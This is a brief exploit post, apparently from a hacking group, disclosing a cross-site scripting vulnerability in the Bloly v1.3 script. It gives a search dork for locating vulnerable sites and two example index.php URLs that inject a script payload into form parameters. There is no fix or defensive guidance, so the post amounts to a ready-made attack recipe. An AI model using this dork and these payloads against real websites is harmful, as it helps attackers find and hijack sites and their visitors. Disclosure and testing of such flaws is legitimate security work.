Bloly v1.3 Cross Site Scripting Vulnerability

Bloly v1.3 Cross Site Scripting Vulnerability
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script Bloly v1.3
download:http://www.bloly.com
-----------------------------------------------------------
Exploit:
--------
dork: Bloly v1.3 by SoftCab Inc

Exmple:
-------
index.php?action=3email=&password=&remember=1&=<script>alert(1)</script>
index.php?action=11q=&=[input XSS] <script>alert(1)</script>
-----------------------------------------------------------
Zryan_kurd ,root-SyS
-----------------------------------------------------------